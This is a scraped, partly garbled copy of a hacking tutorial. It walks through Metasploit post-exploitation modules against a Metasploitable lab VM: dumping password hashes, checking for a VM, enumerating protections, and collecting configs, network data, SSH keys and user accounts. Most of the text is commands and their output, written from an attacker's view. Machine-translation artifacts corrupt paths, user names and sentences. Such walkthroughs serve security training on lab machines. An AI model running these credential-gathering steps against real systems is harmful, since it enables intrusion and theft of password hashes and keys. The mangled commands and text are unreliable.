قالب وردپرس درنا توس
Home / Tips and Tricks / How to Quickly Gather Target Information with Metasploit Post Modules «Zero Byte :: WonderHowTo

How to Quickly Gather Target Information with Metasploit Post Modules «Zero Byte :: WonderHowTo



Post-exploitation information gathering can be a long and drawn-out process, but it is an essential step when trying to pivot or establish advanced persistence. Every hacker should know how to enumerate a target manually, but sometimes it is worth it to automate the process.

In the previous tutorial, we used Metasploit's local exploit suggester to get root on the target. To use post modules, we need to have a meterpreter session running.

What Information Is Most Valuable to Attackers?

It has been said time and time again that reconnaissance is one of the most critical phases of an attack. It applies to not only the initial preparation for an attack, but also the post-exploitation stage.

Some of the most valuable information to an attacker includes things like password hashes, credentials, and any other sensitive data that could be abused. Checking what defenses are in place, such as antivirus or firewall rules, is also a smart move.

Module 1: Hashdump

To get started, from the main prompt in Metasploit, use the sessions command to display the current sessions running in the background:

 msf5> sessions

Active sessions
===============

  Id Name Type Information Connection
  - ---- ---- ----------- ----------
  1 shell cmd / unix 10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2 meterpreter x86 / linux uid = 1, gid = 1, euid = 1, egid = 1 @ metasploitable.localdomain 10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
  3 meterpreter x86 / linux uid = 0, gid = 0, euid = 0, egid = 0 @ metasploitable.localdomain 10.10.0.1:4321 -> 10.10.0.50:56950 (10.10.0.50) 

Session 3 is ideal here since it is running as root;

To see the available post modules, we can start by typing the full path and fast pressing Tab twice to see the autocomplete options:

 msf5> use post / linux / gather /

use post / linux / gather / checkcontainer use post / linux / gather / enum_network use post / linux / gather / enum_xchat use post / linux / gather / openvpn_credentials
use post / linux / gather / checkvm use post / linux / gather / enum_protections use post / linux / gather / gnome_commander_creds use post / linux / gather / phpmyadmin_credsteal
use post / linux / gather / ecryptfs_creds use post / linux / gather / enum_psk use post / linux / gather / gnome_keyring_dump use post / linux / gather / pptpd_chap_secrets
use post / linux / gather / enum_commands use post / linux / gather / enum_system use post / linux / gather / hashdump use post / linux / gather / tor_hiddenservices
use post / linux / gather / enum_configs use post / linux / gather / enum_users_history use post / linux / gather / mount_cifs_creds 

hashdump module; this will dump the password hashes for all users on the system, which can then be attempted to crack. Even though we've already got root on this machine,

use command:

 msf5> use post / linux / gather / hashdump 

We can now look at the options for this post module:

 msf5 post (linux / gather / hashdump)> options

Module options (post / linux / gather / hashdump):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   SESSION yes The session to run this module on. 

Set command and the appropriate session number:

 msf5 post (linux / gather / hashdump)> set session 3

session => 3 

Then, simply type run to launch it:

 msf5 post (linux / gather / hashdump)> run

[+] root: $ 1 $ / avpfBJ1 $ x0z8w5UF9Iv. / DR9E9Lid.: 0: 0: root: / root: / bin / bash
[+] sys: $ 1 $ fUX6BPOt $ Miyc3UpOzQJqz4s5wFD9l0: 3: 3: sys: / dev: / bin / sh
[+] klog: $ 1 $ f2ZVMS4K $ R9XkI.CmLdHhdUE3X9jqP0: 103: 104 :: / home / klog: / bin / false
[+] msfadmin: $ 1 $ XN10Zj2c $ Rt / zzCW3mLtUWA.ihZjA5 /: 1000: 1000: msfadmin ,,,: / home / msfadmin: / bin / bash
[+] postgres: $ 1 $ Rw35ik.x $ MgQgZUuO5pAoUvfJhfcYe /: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
[+] user: $ 1 $ HESu9xrH $ k.o3G93DGoXIiQKkPmUgZ0: 1001: 1001: just a user, 111 ,,: / home / user: / bin / bash
[+] service: $ 1 $ kR3ue7JZ $ 7GxELDupr5Ohp6cjZ3Bu //: 1002: 1002: ,,,: / home / service: / bin / bash
[+] Unshadowed Password File: /root/.msf4/loot/20190619120310_default_10.10.0.50_linux.hashes_719586.txt
[*] Post module execution completed 

Module 2: Checkvm

The next module we will try is the checkvm module;

Load the module:

 msf5 post (linux / gather / hashdump)> use post / linux / gather / checkvm 

And take a look at the options:

 msf5 post (linux / gather / checkvm)> options

Module options (post / linux / gather / checkvm):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   SESSION yes 

Again, we only need to set a session number for this module to work. command to set the option globally. That way, we do not have to keep typing in the same thing over and over again.

 msf5 post (linux / gather / checkvm)> setg session 3

session => 3 

Type run to kick it off:

 msf5 post (linux / gather / checkvm)> run

[*] Gathering system info ....
[+] This appears to be a 'VirtualBox' virtual machine
[*] Post-module execution completed 

Modules 3: enum_protections

The next one we will try out enum_protections

module;

Load the module:

 msf5 post (19659008) linux / gather / checkvm)> use post / linux / gather / enum_protections 

Since we set the session option earlier, it is already set for us when we look at the options:

 msf5 post (linux / gather / enum_protections)> options

Module options (post / linux / gather / enum_protections):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   SESSION 3 yes 

msf5 post (linux / gather / enum_protections)> run

[*] Running module against 10.10.0.50 [metasploitable] [*] Info:
[*] _ _ _ _ _ _ _____ __ ___ ___ | | _ __ _ ___ _ __ | | ___ (_) | _ __ _ | | __ | | ___ | ___ | '_ `_ / _ __ / _` / __ | '_ | | / _ | | __ / _` | '_ | | / _ __) || | | | | | __ / || (_ | __ | _) | | (_) | | || (_ | | | _) | | __ // __ / | _ | | _ | | _ | ___ | __ __, _ | ___ / .__ / | _ | ___ / | _ | __ __, _ | _.__ / | _ | ___ | _____ | | _ | Warning: Never expose this VM to an untrusted network! Contact: msfdev [at] metasploit.comLogin with msfadmin / msfadmin to get started
[*] Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
[*] Finding system protections …
[+] ASLR is enabled
[*] Finding installed applications …
[+] ufw found: / usr / sbin / ufw
[+] iptables found: / sbin / iptables
[+] logrotate found: / usr / sbin / logrotate
[+] tcpdump found: / usr / sbin / tcpdump
[+] aa-status found: / usr / sbin / aa-status
[*] Post module execution completed

We can not give it a banner this time, even though it is a little disjointed. It looks like it has some firewall software, tcpdump, and ASLR is enabled;

Module 4: enum_configs

The next module we will try is the enum_configs module; any configuration files for commonly installed software.

Load the module:

 msf5 post (linux / gather / enum_protections)> use post / linux / gather / enum_configs 

And run it:

 msf5 post (linux / gather / enum_configs)> run

[*] Running module against 10.10.0.50 [metasploitable]
[*]  Info:
[*] _ _ _ _ _ _ _____ __ ___ ___ | | _ __ _ ___ _ __ | | ___ (_) | _ __ _ | | __ | | ___ | ___  | '_ `_  / _  __ / _` / __ | '_  | | / _  | | __ / _` | '_  | | / _  __) || | | | | | __ / || (_ |  __  | _) | | (_) | | || (_ | | | _) | | __ // __ / | _ | | _ | | _ |  ___ |  __  __, _ | ___ / .__ / | _ |  ___ / | _ |  __  __, _ | _.__ / | _ |  ___ | _____ | | _ | Warning: Never expose this VM to an untrusted network! Contact: msfdev [at] metasploit.comLogin with msfadmin / msfadmin to get started
[*] Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
[+] apache2.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt
[+] ports.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_670485.txt
[-] Failed to open file: /etc/nginx/nginx.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snort/snort.conf: core_channel_open: Operation failed: 1
[+] my.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_055449.txt
[+] ufw.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_162601.txt
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_122073.txt
[-] Failed to open file: /etc/security.access.conf: core_channel_open: Operation failed: 1
[+] shells stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_678197.txt
[-] Failed to open file: /etc/security/sepermit.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/ca-certificates.conf: core_channel_open: Operation failed: 1
[+] access.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_706115.txt
[-] Failed to open file: /etc/gated.conf: core_channel_open: Operation failed: 1
[+] rpc stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_755377.txt
[-] Failed to open file: /etc/psad/psad.conf: core_channel_open: Operation failed: 1
[+] debian.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_345601.txt
[-] Failed to open file: /etc/chkrootkit.conf: core_channel_open: Operation failed: 1
[+] logrotate.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_800174.txt
[-] Failed to open file: /etc/rkhunter.conf: core_channel_open: Operation failed: 1
[+] smb.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_570254.txt
[+] ldap.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_677851.txt
[-] Failed to open file: /etc/openldap/openldap.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/cups.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: Operation failed: 1
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_441838.txt
[-] Failed to open file: /etc/proxychains.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/snmp.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mail/sendmail.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snmp/snmp.conf: core_channel_open: Operation failed: 1
[*] Post module execution completed 

You can find all sorts of things like Apache config, sysctl, smb, and others. It finds in a directory for later use. For instance, you can view the Apache config by catting the full path to the file:

 msf5 post (linux / gather / enum_configs)> cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051 .txt

[*] exec: cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

#
# Based on the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They are here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
# 1. Directives that control the operation of the Apache server process as a
# whole (the 'global environment').
# 2. Directives that define the parameters of the 'main' or 'default' server,
# which responds to requests that are handled by a virtual host.
# These directives also provide default values ​​for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, which allow web requests to be sent to
#different IP addresses or hostnames and have them handled by the
# same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive: /" for Win32), the
# server wants to use that explicit path. If the filenames do * not * begin
# with "/", the value of ServerRoot is prepended - so "/var/log/apache2/foo.log"
# with ServerRoot set to "" wants to be interpreted by the
# server as "//var/log/apache2/foo.log".
#

... 

Module 5: enum_network

The next module we'll run is the enum_network module; this will gather any network-related information on the target, such as IP addresses, routes, open ports, SSH configs, and DNS information.

Load the module:

 msf5 post (linux / gather / enum_configs )> use post / linux / gather / enum_network 

And run it:

 msf5 post (linux / gather / enum_network)> run

[*] Running module against metasploitable.localdomain
[*] Module running as root
[+] Info:
[+] _ _ _ _ _ _ _____ __ ___ ___ | | _ __ _ ___ _ __ | | ___ (_) | _ __ _ | | __ | | ___ | ___  | '_ `_  / _  __ / _` / __ | '_  | | / _  | | __ / _` | '_  | | / _  __) || | | | | | __ / || (_ |  __  | _) | | (_) | | || (_ | | | _) | | __ // __ / | _ | | _ | | _ |  ___ |  __  __, _ | ___ / .__ / | _ |  ___ / | _ |  __  __, _ | _.__ / | _ |  ___ | _____ | | _ | Warning: Never expose this VM to an untrusted network! Contact: msfdev [at] metasploit.comLogin with msfadmin / msfadmin to get started
[+] Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
[*] Collecting data ...
[+] Network config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt
[+] Route table stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_402588.txt
[+] Firewall config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_273816.txt
[+] DNS config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_884409.txt
[+] SSHD config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_100280.txt
[+] Host file stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_071264.txt
[+] SSH keys stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_372706.txt
[+] Active connections stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_029831.txt
[+] Wireless information stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_821137.txt
[+] Listening ports stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_676900.txt
[+] If-Up / If-Down stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_258463.txt
[*] Post module execution completed 

We have collected a plethora of network information, which could be useful for an attacker. For example, we can view the network's config file:

 msf5 post (linux / gather / enum_network)> cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

[*] exec: cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

eth0 Link encap: Ethernet HWaddr 08: 00: 27: 77: 62: 6c
          inet addr: 10.10.0.50 Bcast: 10.10.0.255 Mask: 255.255.255.0
          inet6 addr: fe80 :: a00: 27ff: fe77: 626c / 64 Scope: Link
          UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
          RX packet: 2643 errors: 0 dropped: 0 overruns: 0 frame: 0
          TX packets: 2139 errors: 0 dropped: 0 overruns: 0 carrier: 0
          collisions: 0 txqueuelen: 1000
          RX bytes: 2268520 (2.1 MB) TX bytes: 361635 (353.1 KB)
          Base address: 0xd010 Memory: f0000000-f0020000

lo Link encap: Local Loopback
          inet addr: 127.0.0.1 Mask: 255.0.0.0
          inet6 addr :: 1/128 Scope: Host
          UP LOOPBACK RUNNING MTU: 16436 Metric: 1
          RX packet: 325 errors: 0 dropped: 0 overruns: 0 frame: 0
          TX packets: 325 errors: 0 dropped: 0 overruns: 0 carrier: 0
          Collisions: 0 txqueuelen: 0
          RX bytes: 125465 (122.5 KB) [bytes] [bytes] [1969090]  Modules 6: enum_system 

The last module we will cover today is the enum_system module; this will collect system information about the target, including linux version, installed packages, running services, cron jobs, and user accounts.

Load the module:

 msf5 post (linux / gather / enum_network)> use post / linux / gather / enum_system 

And run it:

 msf5 post (linux / gather / enum_system)> run

[+] Info:
[+] _ _ _ _ _ _ _____ __ ___ ___ | | _ __ _ ___ _ __ | | ___ (_) | _ __ _ | | __ | | ___ | ___  | '_ `_  / _  __ / _` / __ | '_  | | / _  | | __ / _` | '_  | | / _  __) || | | | | | __ / || (_ |  __  | _) | | (_) | | || (_ | | | _) | | __ // __ / | _ | | _ | | _ |  ___ |  __  __, _ | ___ / .__ / | _ |  ___ / | _ |  __  __, _ | _.__ / | _ |  ___ | _____ | | _ | Warning: Never expose this VM to an untrusted network! Contact: msfdev [at] metasploit.comLogin with msfadmin / msfadmin to get started
[+] Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
[+] Module running as "root" user
[*] Linux version stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_406677.txt
[*] User accounts stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt
[*] Installed Packages stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_051826.txt
[*] Running Services stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_438719.txt
[*] Cron jobs stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_890911.txt
[*] Disk info stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_036761.txt
[*] Logfiles stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_749148.txt
[*] Setuid / setgid files stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_378666.txt
[*] Post module execution completed 

We can not find valuable system information. For instance,

 msf5 post (linux / gather / enum_system)> cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

[*] exec: cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

root
demon
am
sys
sync
games
you
lp
mail
news
uucp
proxy
www-data
backup
ruse
irc
gnats
nobody
libuuid
dhcp
syslog
klog
sshd
msfadmin
bind
postfix
ftp
postgres
mysql
tomcat55
distccd
user
service
telnetd
proftpd
statd 

Wrapping Up

Today, we are reading some of Metasploit's post modules to gather valuable information about the target. The system is a virtual or virtual machine, and even a module for a password hashes. Metasploit makes the job quick and painless. Use Metasploit's WMAP Module to Scan Web Applications for Common Vulnerabilities

Save BIG this holiday weekend with our favorite Black Friday deals on smartphones, headphones, chargers, accessories, TVs, and more.

Cover image by Soumil Kumar / Pexels; Screenshots by drd_ / Null Byte

Source link